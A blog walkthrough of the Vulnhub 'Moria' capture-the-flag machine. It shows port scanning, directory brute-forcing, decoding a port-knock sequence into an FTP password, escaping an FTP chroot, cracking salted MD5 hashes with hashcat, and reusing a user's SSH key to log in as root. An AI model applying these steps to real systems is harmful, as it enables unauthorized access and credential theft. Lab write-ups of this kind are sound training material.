Vulnhub Moria Walkthrough

I spent some time with Moria (v1.1) this past week…super fun machine and a good exercise in thinking outside the box.

And without further ado…here’s Moria.

Nmap shows…

root@kali:~/vulnhub/moria# cat moria.nmap 
# Nmap 7.60 scan initiated Mon Nov  6 18:34:11 2017 as: nmap -sS -sV -oA moria
Nmap scan report for
Host is up (0.00031s latency).
Not shown: 997 closed ports
21/tcp open  ftp     vsftpd 2.0.8 or later
22/tcp open  ssh     OpenSSH 6.6.1 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
MAC Address: 00:0C:29:D5:6D:D5 (VMware)

Service detection performed. Please report any incorrect results at .
# Nmap done at Mon Nov  6 18:34:25 2017 -- 1 IP address (1 host up) scanned in 14.47 seconds

Checking out port 80 we see….

Uh…sure. Admittedly, I’m not good at being a geek. I know this is LOTR related, but meh…I take note, and run gobuster.

root@kali:~/vulnhub/moria# gobuster -u -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,30207,403,500' -e 

Gobuster v1.2                OJ Reeves (@TheColonial)
[+] Mode         : dir
[+] Url/Domain   :
[+] Threads      : 10
[+] Wordlist     : /usr/share/seclists/Discovery/Web_Content/common.txt
[+] Status codes : 403,500,200,204,301,302,307
[+] Expanded     : true
===================================================== (Status: 403) (Status: 403) (Status: 403) (Status: 403) (Status: 200) (Status: 301)

Nothing too interesting…let’s see what’s what in w.

WUT? We keep digging and to save some reading time, we end up with http://moria/w/h/i/s/p/e/r/the_abyss — what’s interesting is that every page refresh present something new.

We see: (with a refresh in between each one)

Balin: "Be quiet, the Balrog will hear you!"
Oin:"Stop knocking!"
Ori:"Will anyone hear us?"
Fundin:"That human will never save us!"
Nain:"Will the human get the message?"
"Eru! Save us!"
"We will die here.."
"Is this the end?"
"Knock knock"
"Too loud!"
Maeglin:"The Balrog is not around, hurry!"
Telchar to Thrain:"That human is slow, don't give up yet"
Dain:"Is that human deaf? Why is it not listening?"

Alrighty then. So…I wasn’t sure what was going on here yet. I went back to the image on the home page. Is there a secret message? I’m not sure…so I saved the image locally, and tried to extract any info out of it using stegosuite.

root@kali:~/vulnhub/moria# stegosuite -x moria.jpg 
Loading jpg image from /root/vulnhub/moria/moria.jpg
Extracting data...
Nf weder 1 noch 3

Interesting. Throwing that into Google, we get the idea that “weder noch” means “neither nor” – so neither 1 nor 3. Honestly, I have no idea if this was any kind of hint or what, but for what it’s worth, I included it here…at least to introduce you to stegosuite perhaps if you haven’t encountered it before.

Ok…so where were we? After reviewing the phrases on “the_abyss,” we see a theme of hearing, listening, knocking. So let’s listen. Fire up wireshark, and we see this (output below is filtered, but the content is what we’re interested in)

This pattern repeats, over and over. Destination ports 77, 101, 108, 108, 111, 110, 54, 57. I tried several times to see if port knocking would have any affect using the specified order, but no such luck. Nmap scans returned no new ports, and nothing seemed to be changing. As Telchar said to Thrain, “That human is slow, don’t give up yet.”

Being a slow human, I wasted some time trying to figure out what this meant. Ultimately, I landed here:, and finally figured out that 77, 101, 108, 108, 111, 110, 54, 57 converted to ascii gives us “Mellon69” … ok then. Looks like a password to me. Where can we use it? How about that ftp server?

After trying a few defaults (admin, root, moria, etc.) I noticed the FTP welcome message: “Welcome Balrog” – so I try that…and success!

root@kali:~/vulnhub/moria# ftp
Connected to
220 Welcome Balrog!
Name ( Balrog
331 Please specify the password.
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

A little exploration leads to…directory traversal. Excellent…let’s see what we can find.

ftp> pwd
257 "/prison"
ftp> cd /
250 Directory successfully changed.
ftp> pwd
257 "/"
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
lrwxrwxrwx    1 0        0               7 Mar 11  2017 bin -> usr/bin
dr-xr-xr-x    4 0        0            4096 Mar 11  2017 boot
drwxr-xr-x   21 0        0            3240 Nov 08 06:07 dev
drwxr-xr-x   97 0        0            8192 Nov 10 00:35 etc
ftp> cd /var/www/html
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0              23 Mar 12  2017 QlVraKW4fbIkXau9zkAPNGzviT3UKntl
-r--------    1 48       48             85 Mar 12  2017 index.php
-r--------    1 48       48         161595 Mar 11  2017 moria.jpg
drwxr-xr-x    3 0        0              15 Mar 12  2017 w
226 Directory send OK.

We’ve found that we can break out of /prison, and explore the file system. In /var/www/html, we find an interesting directory…what can that be?

Looks like some md5 hashes. I took the hashes, threw them into hashcat against rockyou, and nothing…generated some LOTR wordlists…nothing. Hmph. Perhaps I should’ve dug deeper. (use the source, Luke). Viewing the source of the page shows us that this is an md5(md5(password).salt) hash. Oh…and it conveniently gives us the salt value as well. Good deal.

A little Googling shows that the proper hashcat mode is 2611.

root@wopr/Users/gmurphy/hashcat$ cat moria.hashes

root@wopr/Users/gmurphy/hashcat$ ./hashcat -m 2611 -a 0 moria.hashes rockyou.txt
hashcat (v3.5.0-149-g23b5e7f) starting...

Dictionary cache hit:
* Filename..: rockyou.txt
* Passwords.: 14343298
* Bytes.....: 139921513
* Keyspace..: 14343298


Session..........: hashcat
Status...........: Cracked
Hash.Type........: vBulletin < v3.8.5
Hash.Target......: moria.hashes
Time.Started.....: Wed Nov  8 00:56:47 2017 (0 secs)
Time.Estimated...: Wed Nov  8 00:56:47 2017 (0 secs)
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#2.....: 48572.0 kH/s (7.24ms)
Recovered........: 9/9 (100.00%) Digests, 9/9 (100.00%) Salts
Progress.........: 5898375/129089682 (4.57%)
Rejected.........: 135/5898375 (0.00%)
Restore.Point....: 0/14343298 (0.00%)
Candidates.#2....: 123456 -> grape06

Started: Wed Nov  8 00:56:38 2017

Great…now we have what seems to be some usernames and passwords. Enumerating through the list lands us an SSH login using Ori. Let’s dig in…

root@kali:~/vulnhub/moria# ssh Ori@
Ori@'s password: 
Last login: Thu Nov 9 17:56:44 2017 from
-bash-4.2$ ls -lah
total 16K
drwx------  3 Ori  notBalrog   55 Nov  9 19:59 .
drwxr-x---. 4 root notBalrog   32 Mar 14  2017 ..
-rw-------  1 Ori  notBalrog 9.2K Nov  9 17:57 .bash_history
drwx------  2 Ori  notBalrog   57 Mar 12  2017 .ssh
-rw-r--r--  1 root root       225 Mar 13  2017 poem.txt
-bash-4.2$ cat poem.txt 
Ho! Ho! Ho! to the bottle I go
To heal my heart and drown my woe.
Rain may fall and wind may blow,
And many miles be still to go,
But under a tall tree I will lie,
And let the clouds go sailing by. 

PS: Moria will not fall!

Poem.txt doesn’t really show anything interesting, but at least I have a good drinking song for my upcoming guys weekend! But I digress…back to the good stuff.

Let’s check out .ssh and see what we find.

-bash-4.2$ ls -lah 
total 12K
drwx------ 2 Ori notBalrog   57 Mar 12  2017 .
drwx------ 3 Ori notBalrog   55 Nov  9 19:59 ..
-rw------- 1 Ori notBalrog 1.7K Mar 12  2017 id_rsa
-rw-r--r-- 1 Ori notBalrog  392 Mar 12  2017
-rw-r--r-- 1 Ori notBalrog  342 Nov  9 18:12 known_hosts
-bash-4.2$ cat known_hosts ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCuLX/CWxsOhekXJRxQqQH/Yx0SD+XgUpmlmWN1Y8cvmCYJslOh4vE+I6fmMwCdBfi4W061RmFc+vMALlQUYNz0=

So Ori has ssh’d into before. Interesting indeed. Two things to take note of here, if you’re not familiar with public key authentication:

  • “known_hosts” contains the public key of hosts that you have previously SSH’d into
  • “authorized_keys” specifies the SSH keys that can be used for logging into a user account when public key auth is configured

With that…let’s see if we’re lucky enough that Ori’s key was in root’s “authorized_keys”.

-bash-4.2$ ssh root@ -i id_rsa
Last login: Thu Nov  9 22:42:22 2017 from
[root@Moria ~]# id
uid=0(root) gid=0(root) groups=0(root)
[root@Moria ~]# cat /root/flag.txt 
“All that is gold does not glitter,
Not all those who wander are lost;
The old that is strong does not wither,
Deep roots are not reached by the frost.

From the ashes a fire shall be woken,
A light from the shadows shall spring;
Renewed shall be blade that was broken,
The crownless again shall be king.” 

All That is Gold Does Not Glitter by J. R. R. Tolkien

I hope you suff.. enjoyed this VM. It wasn't so hard, was it?

[root@Moria ~]#


Excellent! Root it is. Nicely done challenge, Abatchy.

Thanks for reading…hopefully you have learned something.